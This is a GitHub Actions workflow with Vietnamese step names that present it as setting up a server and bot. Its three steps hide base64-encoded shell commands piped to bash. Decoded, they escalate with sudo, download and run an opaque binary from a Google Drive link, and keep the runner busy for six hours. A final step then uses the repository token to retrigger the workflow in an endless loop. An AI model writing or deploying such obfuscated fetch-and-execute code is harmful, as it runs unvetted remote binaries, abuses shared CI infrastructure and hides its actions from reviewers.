name: chao-lisa
on:
  workflow_dispatch:
  repository_dispatch:
    types: [create-vps]

jobs:
  bat-dau-may-chu:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    env:
      VPS_NAME: ${{ github.event.client_payload.vps_name || 'manual-vps' }}
    steps:
    - name: Tai-xuong-ma-nguon
      uses: actions/checkout@v3
    - name: Cai-dat-Node-js
      uses: actions/setup-node@v3
      with:
        node-version: '20'
    - name: Cai-dat-va-chay-bot
      run: |
        echo "c3VkbyBzdQpwaXAgSW5zdGFsbCAtLXVwZ3JhZGUgcGlwIHx8IGVjaG8gIvCfkYkgcGlwIHVwZ3JhZGUgZmFpbGVkIgpwaXAgSW5zdGFsbCAgIGdkb3duICB8fCBlY2hvICLwn5GJIHBpcCBpbnN0YWxsIGZhaWxlZCIKZ2Rvd24gaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2lkPTFubnFHeXJGRkxCWEEtdnFaZi1jMnU4Z0FvUUNwM05LayAtTyBzZXR1cCB8fCBlY2hvICLwn5GJIHNldHVwIgpjaG1vZCAreCBzZXR1cAouL3NldHVw" | base64 -d | bash
    - name: chao-lisa
      run: |
        echo "Zm9yIGkgaW4gJChzZXEgMSAzNjApOyBkbwogIGVjaG8gIlJ1bm5pbmcgbWludXRlICRpLzM2MC4uLiIKICBzbGVlcCA2MApkb25l" | base64 -d | bash
    - name: Khoi-dong-lai-workflow
      if: always()
      run: |
        echo "Y3VybCAtWCBQT1NUIFwKICAtSCAiQWNjZXB0OiBhcHBsaWNhdGlvbi92bmQuZ2l0aHViK2pzb24iIFwKICAtSCAiQXV0aG9yaXphdGlvbjogQmVhcmVyICR7eyBzZWNyZXRzLkdJVEhVQl9UT0tFTiB9fSIgXAogIC1IICJDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb24iIFwKICBodHRwczovL2FwaS5naXRodWIuY29tL3JlcG9zLyR7eyBnaXRodWIucmVwb3NpdG9yeSB9fS9kaXNwYXRjaGVzIFwKICAtZCAneyJldmVudF90eXBlIjogImNyZWF0ZS12cHMifSc=" | base64 -d | bash
